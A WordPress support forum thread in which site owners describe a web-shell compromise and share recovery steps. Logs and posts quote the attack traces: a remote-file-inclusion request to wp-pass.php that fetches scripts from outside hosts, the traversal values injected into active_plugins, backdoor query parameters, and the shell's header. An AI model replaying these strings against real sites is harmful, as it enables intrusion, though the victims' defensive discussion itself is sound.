WordPress.org

Ready to get started?Download WordPress

Forums

Weird and Dangerous : ro8kfbsmag.txt (47 posts)

  1. SimonJ
    Member
    Posted 6 years ago #

    Well, I don't know where to post this question.

    LAST WEEK, I had a big problem on my wordpress installation. All the plugins was disable and all the "attachement" posts status had changed to "post"... As a result, I saw no uploads file via the admin browser.

    After a short investigation, I saw that the last post in the database had only "ro8kfbsmagtxt" for content...

    I was able to repair the site by using a backup on my server.

    YESTERDAY, I was browsing via SSH on my server and I found in the TMP folder a file called "ro8kfbsmag.txt"... Hum hum. I downloaded it, and it's a PHP script, with a form, and with the title :"Magic Include Shell by Mag icq 884888"

    Well, I don't like it... :-o

    Here is the content of the file... If any WP guru could take care of it, It sounds dangerous to me...

    S.

    ---------- ro8kfbsmag.txt ---------------

    <?php
    /*Magic Include Shell by Mag icq 884888*/
    //TODO: ñëèòü ôàéëî íà ñâîé ôòï (!), ðàáîòà ñ äèðàìè (.), ðåíåéì ôàéëîâ (?), îòïðàâêà ïîñò, ãåò, êóêîâ ÷åðåç ñîêåòû (!!!)
    $ver='1.6';
    if(isset($_GET[pizdecnax]))
    {
    ...

    Large PHP code removed by moderator. You can find this file via google, if you want.

  2. smithdan
    Member
    Posted 6 years ago #

    This also happened to my wordpress blog. The plugins were all disabled, the pages showed up as posts, and the admin password was changed.

    The attacker was also able to upload a new theme in the wp-content dir. They were also able to explore the file system using the 'dira' parameter.

    The same ro8kfbswmag.txt was placed in /tmp/

    The initial attack showed up in the access logs

    dan.smith.name 82.103.135.182 - - [05/Nov/2007:09:33:29 -0600] "GET / HTTP/1.0" 200 38326 "-" "Opera/9.23 (Windows NT 5.1; U; ru)" 195 38635
    dan.smith.name 82.103.135.182 - - [05/Nov/2007:09:35:31 -0600] "GET /?piska HTTP/1.0" 200 8423 "http://localhost/wp-toolz/?mode=shell&what=2122" "Opera/9.23 (Windows NT 5.1; U; ru)" 259 8671
    dan.smith.name 82.103.135.182 - - [05/Nov/2007:09:35:50 -0600] "POST /index.php?piska&dira=./ HTTP/1.0" 200 8774 "http://dan.smith.name/?piska" "Opera/9.23 (Windows NT 5.1; U; ru)" 364 9022

    Please let me know if you need any additional information, and advise.

  3. moshu
    Member
    Posted 6 years ago #

    1. Alert your host! - it might be that the hacker got access to the server elsewhere...
    2. Do NOT have any files left world writable (chmod 666) - like when editing theme files online.
    3. Change all your passwords.
    4. UPGRADE!

  4. SimonJ
    Member
    Posted 6 years ago #

    Many Thanks Moshu for your answer.

    The host is me... :-) It's my own server, the site generated too much traffic and server load for a "standart host", so, I bought my own server and I'm now on my own. I alerted the sysdamin I hire for the server and I gave him a copy of the "ro8kfbswmag.txt" file.

    I can't find any logs like those posted by smithdan, but I see some weird entry a little while before the attack, and on the same day, from a korean ISP :

    ________The days before :
    220.120.22.131 - - [21/Oct/2007:22:45:29 -0400] "GET http://91pinker.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [21/Oct/2007:22:45:29 -0400] "GET http://91pinker.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [21/Oct/2007:22:45:29 -0400] "GET http://91pinker.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [21/Oct/2007:22:45:29 -0400] "GET http://91pinker.com/prx.php HTTP/1.0" 302 293
    220.120.22.131 - - [21/Oct/2007:22:45:29 -0400] "GET http://91pinker.com/prx.php HTTP/1.0" 302 293
    _________________________________

    __________THE SAME DAY :

    220.120.22.131 - - [23/Oct/2007:23:12:49 -0400] "GET http://135531.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [23/Oct/2007:23:12:49 -0400] "GET http://135531.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [23/Oct/2007:23:12:49 -0400] "GET http://135531.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [23/Oct/2007:23:12:49 -0400] "GET http://135531.com/prx.php HTTP/1.0" 302 293
    220.120.22.131 - - [23/Oct/2007:23:12:49 -0400] "GET http://135531.com/prx.php HTTP/1.0" 302 293
    ____________________________

    If you take a look at the first domain : http://91pinker.com/prx.php

    Or the root :
    http://91pinker.com/

    It seems to be a php proxy... Well... At this point, I really don't have the knowledge to figure anything, but it looks weird and dangerous. ;-) The second domain is different ( 135531.com ) but it uses the same prx.php ...

    ------------------
    Anyway, I hope that posting these infos here will be helpful for the wordpress community and the wordpress team to determine the nature of this "exploit" and if it bears on a security hole in WP. If I can be of any help for more information, just let me know!

    ------------------

    Thanks again Moshu for your advises... As you suggest, I changed ALL my passwords, everywhere, on the server and on the WP admin accounts. I did'nt have any other problem since.

    I know that I'm ready for an upgrade, but the site is really heavy and I'll have to work around some theme and plugins problems before to do so. ;-)

    Thanks again.

    S.

  5. SimonJ
    Member
    Posted 6 years ago #

    Oh! And I forgot...

    The problem description by DanSmith was exactly the same for me... :"The plugins were all disabled, the pages showed up as posts, and the admin password was changed."

    S.

  6. DavidHolder
    Member
    Posted 6 years ago #

    I have experienced this problem too and have some more information and another solution.

    The sequence of events was as follows (unfortunately my logs don't record POST data):

    1. POST /wp-admin/admin-ajax.php
    2. POST /wp-admin/options.php
    3. POST /wp-admin/options.php
    4. POST /wp-admin/options.php
    5. POST /wp-admin/options.php
    6. POST /wp-admin/options.php
    7. POST /wp-admin/options.php
    8. POST /wp-admin/upload.php?style=inline&tab=upload&post_id=-1
    9. POST /wp-admin/options.php
    10. POST /wp-admin/options.php
    11. GET /wp-admin/upgrade.php?step=1
    12. GET /?kreved
    13. GET /index.php?kreved&dira=./wp-content
    14. GET /index.php?kreved&&dira=./wp-content/uploads
    15. POST /index.php?kreved&&dira=./wp-content/uploads
    16. GET /wp-content/uploads/
    17. GET wp-content/uploads/zip.php

    After this the hacker uploaded lost of nasty stuff as zip files into the /wp-content/uploads/ directory. The hacker did this using the backdoor mentioned in an earlier post. The backdoor is configured within WordPress as a plugin and is referenced by the URL /?kreved. This executes the file that has been uploaded by the hacker into /tmp. The file is called ro8kbsmag.txt.

    After carefully checking my wordpress files (using checksums against a clean install) I determined that the hacker had not changed any of the standard files.

    What the hacker had done is modified two options in the database, specifically; upload_path and active_plugins.

    Upload_path was set to /../../../../../../../../../../../../../../../../../tmp and active_plugins to a:1:{i:0;s:69:"/../../../../../../../../../../../../../../../../../tmp/ro8kbsmag.txt";}.

    Setting these back to their default values fixed my installation.

    To stop the hacker doing it again I added web server access controls to the wp-admin directory. This extra layer of security should stop them getting in again.
    It would be nice to know what the POST data was that allowed the hacker to do this. Has anyone else captured this?

    David

  7. Jeremy Clark
    Moderator
    Posted 6 years ago #

    You said your self that the whole reason that the hacker was able to do anything was because they modified your database. You need to secure that. Change the password, and username for the database. If your hosting yourself don't allow tcp connections from outside to the mysql port, better yet disable the port all together it's not needed when wp and the database are on the same server. Lastly make sure that your wp-config.php file has the correct permissions.

  8. DavidHolder
    Member
    Posted 6 years ago #

    No. The hacker changed the settings in the wp_options database table via WordPress not via SQL. The database port is disabled (and firewalled since I am paranoid) and only allows access from the localhost. Since I don't have the POST data I cannot determine exactly how the hacker managed to change entries in wp_options. But what the traces do show is that it was done through a process of repeated POSTs first to admin.ajax.php, then options.php, upload.php, options.php and finally upgrade.php.

    You are correct to suggest changing the passwords, which I had done but not mentioned. The hacker did not change these, but they did have access to the database and config file through the hack and therefore would have been able to take a copy of the passwords.

    David

  9. RCanine
    Member
    Posted 6 years ago #

    Just had this happen to my WP install. Please keep this thread updated.

  10. joepie91
    Member
    Posted 6 years ago #

    This text file you mentioned, is a shell. The hacker probably uploaded it trough an exploit in WordPress (or just bruteforced the admin account) and uploaded a shell. A shell is used to have easy remote access to databases and files. It's actually just a trojan/backdoor for a web server.
    It's best to try to find out where the exploit is, and how you could remove it. Also, you should report the exploit to the WordPress team, and wait for a fix, or write one yourself if you're skilled enough. If you got any questions, e-mail me at jamsoftgamedev@gmail.com.

    Good luck.

  11. whooami
    Member
    Posted 6 years ago #

    thats a standard php include attack -- it does NOT require anyone to brute force the admin account.

    Furthermore, Google's cache of ryancannon.com as of Dec 24 shows you running 2.2.1. That pretty much covers the "how did they do it".

  12. Shaliza
    Member
    Posted 6 years ago #

    I did a Google search & some site came up about it, but most of it is in a different language.

    I'm glad this doesn't affect 2.3.1

  13. ontrack
    Member
    Posted 6 years ago #

    This also happened to my site. I'm no programmer, but the explanation of this particular hack on the url below appears to be a good one:

    http://blog.taragana.com/index.php/archive/detailed-post-mortem-of-a-website-hack-through-wordpress-how-to-protect-your-wordpress-blog-from-hacking/

  14. begtognen
    Member
    Posted 6 years ago #

    This happened to me as well. I checked my database and found this:

    Upload_path was set to /../../../../../../../../../../../../../../../../../tmp and active_plugins to a:1:{i:0;s:69:"/../../../../../../../../../../../../../../../../../tmp/ro8kbsmag.txt";}.

    The solution above says: "Setting these back to their default values fixed my installation."

    What are the default values?

    Thanks much.

  15. sandynata
    Member
    Posted 6 years ago #

    What are the default values?

    wp-content/uploads

    FYI, just go to Option > Miscellaneous

  16. daniel.phiinx
    Member
    Posted 6 years ago #

    I did as you suggested, it worked. now what i need to know is, is ther anything besides the mysql post_type tag which differentiates pages from posts (so i could automate restoration)

  17. daniel.phiinx
    Member
    Posted 6 years ago #

    Nevermind what i said before, I figured it out.
    If you pass the following SQL query to the database it should correct the pages/posts damage.

    In SQL:

    UPDATE wp_posts
    SET post_type = 'page'
    WHERE menu_order<>'0'

    In PHP:

    $sql = 'UPDATE wp_posts'
    . ' SET post_type = \'page\''
    . ' WHERE menu_order<>\'0\''
    . ' ';

  18. saphod
    Member
    Posted 6 years ago #

    Same happened to me today. After typing in the URL of my weblog, I just saw a lot of error messages, which included something like "permission denied" and "/../ (...) /tmp/ro8kbsmag.txt". Site Layout was totally messed up, only one page was showing in the page menu.

    Took a further look into the database - same things as mentioned above. Pages were converted to posts, and I even saw posts that were supposed to be links to uploaded pictures...

    I replaced the database with a backup and now everything is fine. Guess I will have to update soon, that's why my site is now in maintenance mode.

    Thanks for your help, pals!

  19. saphod
    Member
    Posted 6 years ago #

    [Update]

    My webhost told me that it was injected using a vulnerability in wp-pass.php, also see

    http://seclists.org/bugtraq/2007/Jul/0039.html and e.g.

    http://mou.me.uk/2008/02/13/hackers-attempting-to-exploit-a-wordpress-vulnerability-using-wp-pass-php/

    http://trac.wordpress.org/ticket/4606

    Here's a logfile excerpt:

    ----------
    http://www.saphod.net***201.43.55.205 - - [27/Mar/2008:01:48:41 +0100] "GET //wp-pass.php?_wp_http_referer=http://www.freewebs.com/haddem/phpbot.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    http://www.saphod.net***81.86.41.163 - - [27/Mar/2008:02:43:48 +0100] "GET /wp-pass.php?_wp_http_referer=http://freewebs.com/diegoxfelix/ch.txt?? HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    http://www.saphod.net***72.4.241.28 - - [27/Mar/2008:02:54:08 +0100] "GET //wp-pass.php?_wp_http_referer=http://www.xsenharox.xpg.com.br/suvbni HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    http://www.saphod.net***72.4.241.28 - - [27/Mar/2008:04:00:53 +0100] "GET //wp-pass.php?_wp_http_referer=http://xsenharox.xpg.com.br/suvbni? HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    ----------

    This seems to be a known bug.

    My host replied I could suppress this behaviour by the following lines in .htaccess:

    ----------
    RewriteEngine On

    RewriteCond %{REQUEST_URI} (.*)wp-pass.php(.*) [NC]
    RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC]
    RewriteRule ^(.*) - [F]
    -----------

    For this, also see:
    http://wp.dembowski.net/2007/07/10/htaccess-to-prevent-wp-passphp-redirects/

    Well, I am not a Rewrite guru... would WP still work after this? Anyway, I should update... is this patched in 2.3.3?

  20. macsoft3
    Member
    Posted 6 years ago #

    >the admin password was changed

    I would trash that user account because they already know the username and create a new admin account.

  21. saphod
    Member
    Posted 6 years ago #

    Today, I noticed that my header.php and footer.php must have been altered: there were some strange spam links in the (generated) HTML-code of my site within a DIV-container that had the attribute "hidden".

    That must have slipped my mind while upgrading my WP installation: of course, my (custom) theme templates were NOT upgraded.

    Thank God the code was not (X)HTML-valid: I found it while validating. :-)

    That also seems to have been done by the hack, so make sure you check your theme files are OK.

  22. saphod
    Member
    Posted 6 years ago #

    OK, I took a further look at those links that appeared in my hacked footer.php. ALL OF THEM lead to a domain called http://www.rashmisinha.com. That looks like a normal blog, but now, try this (this is just for presentation purposes, not supposed for spamming reasons here):

    http://www.rashmisinha.com/archive/rams/9/919588447.html

    This leads to tablets-city.com!!!

    Is this another exploit?

    I tried to contact the blog author of http://www.rashmisinha.com, but found no contact details. Apparently, she is a cofounder of slideshare.net. Can anyone with an account there write on her wall? It seems like her server was turned in to a zombie.

    Couldn't find anything on the net for "archive/rams/..."

  23. hockeymonkey
    Member
    Posted 6 years ago #

    I got hit with this, too, and I have a couple of questions.

    Does WordPress issue security bulletins? It would be nice to have a central clearing house (with an RSS feed or e-mail list) for information on this kind of exploit, including exactly which versions are affected, and all the steps needed to a) close the vulnerability and b) repair the damage. Maybe this exists and I don't know about it?

    I *think* I've both closed the hole and repaired the damage (or most of it; still haven't converted my pages back to pages), but I may have missed something.

    Thanks!

  24. Storyman
    Member
    Posted 6 years ago #

    Would the posters who have been hit by this hack please post which version of WordPress they are running.

    Is this particular hack something that has been fixed in WP 2.5?

  25. whooami
    Member
    Posted 6 years ago #

    while it might seem valuable to know what versions someone was running, in the end its useless information

    Why?

    Because so many upgrades end up not being complete.. as evidenced by the hundreds of posts on here where someone missed upgrading a file, etc.. Ideally, someone is going to have all 2.5 files, or all 2.3.3 files, or .. or .. but some dont.

    Next, because someone discovers something running 2.5, or 2.3.3 doesnt necessarily mean that that version is insecure. It may very well mean that the owner upgraded from a version that had been previously exploited, but didnt know ..

    I have working examples. A previously exploited site that I set up logging on ..They had been running 2.1 something or 2.2 (I dont reme which). We upgraded them to 2.3.3, changing the only admin password in the process. It took only a matter of an hour or so, before said exploiter came back and tried to "insert content" into a post. Failing to do so, they immediately attempted an old, but very public SQL exploit that had been used to get the admin password. That didnt work either, obviously, since they were no longer running the older exploitable version.

    In other words, they already had the admin password from the blog being previously exploitable. They were going to be able to continue exploiting, until the password was changed. There was also no telling how long that previous admin password had been compromised, but it had probably been so for a while.

    Had it NOT been for the logging of all of this, and had the password not been changed, it would have outwardly have appeared as if 2.3.3 was vulnerable.

    Follow?

    The other factor is the PHP rootshell aspect of this. A good deal of people simply dont pay attention to the files to realize immediately when a rootshell was uploaded.

    Tack on insecure plugins..
    Tack on using other insecure web apps that dont get upgraded -- joomla, coppermine, and gallery come to mind immediately in that regard.

    ---

    Is this particular hack something that has been fixed in WP 2.5?

    You make a miguided assumption in that question. Nothing indicates that 2.3.3 is, prima facea, insecure. Therefore, it follows that there is nothing to fix in 2.5.

    --

    if you are paranoid, set up logging. Watch what happens to your blog.

    http://www.village-idiot.org/archives/2008/04/03/wordpress-capturing-_post-requests/

    -- Lastly, as an addendum, ro8kfbsmag.txt is a PHP rootshell. left unnoticed on ANY web site, it does not matter what version of anything someone is using. Called directly, the file provides access to just about any shell command (atleast those that PHP has access to). You could have fort fricken knox installed and they would still have a way in. Well thats not entirely true, but you get the idea.

  26. Storyman
    Member
    Posted 6 years ago #

    Wooami,

    Thanks for info and link to capturing post request (it is now installed).

  27. nitro2k01
    Member
    Posted 6 years ago #

    I was recently struck by this as well, and here is what I did:

    1. I backed up the blog (I exported XML from withn in WP, and SQL from phpMyAdmin)
    2. I deleted my old version and installed a fresh, up to date WP instance
    3. Then I re-imported the blog structure (XML)

    Apparently I thought my pages were gone, until I discovered they were just downgraded to posts. That means my pages were indeed saved in the XML export but without menu_order attribute, since WP thought they were posts.
    No problem, since post_parent was still saved in XML, even for posts. So I did this to make convert the posts into pages.

    UPDATE wp_posts
    SET post_type = 'page'
    WHERE
    post_parent !=0

    WP still wouldn't list them, so what I did then was to edit them using page.php?action=edit&post=xx which made them show up in the listing and work correctly from the index.php as well. What I'm wondering now is, do I have to do anything more than that to fully convert a post into a page?

  28. K3200
    Member
    Posted 6 years ago #

    I've had this problem occur twice in the same 3 week period. And yes, I am in the midst of trying to upgrade to 2.5 now. My site is currently using 2.1.

    The first time this happened I followed instructions from the forum and everything worked great. This last time (today) I did the same things, and everything now works great except the following error at the top of my blog.

    Warning: include_once(/public_html/wp-content/plugins//../../../../../../../../../../../../../../../../../tmp/ro8kfbsmag.txt) [function.include-once]: failed to open stream: Permission denied in /public_html/wp-settings.php on line 205

    Warning: include_once() [function.include]: Failed opening '/public_html/wp-content/plugins//../../../../../../../../../../../../../../../../../tmp/ro8kfbsmag.txt' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /public_html/wp-settings.php on line 205

    What do I do to fix this?

    I deleted the file ro8kfbsmag.txt, switched all my pages from posts back to pages and changed the upload location back to default. I can post and my blog works fine, it just has this error message and everything looks like crap.

    Thanks!

    P.S. The domain is http://www.crookedpitch.com

  29. whooami
    Member
    Posted 6 years ago #

    youre getting that error because something is trying to include that file. LOOK at the error.

    In other words, there is still malicious code in your files.

  30. saphod
    Member
    Posted 6 years ago #

    Check your database, table "wp_options" and look for the option name "active_plugins". I think I remember that it was changed to contain the path to that ro8kfbsmag.txt. If it does, just set the value blank and reactivate your plugins. That should work. But do not forget to backup your DB first.

    Also, look at your header.php and footer.php of your theme if it contains any suspicious links at the top or bottom!

Topic Closed

This topic has been closed to new replies.

About this Topic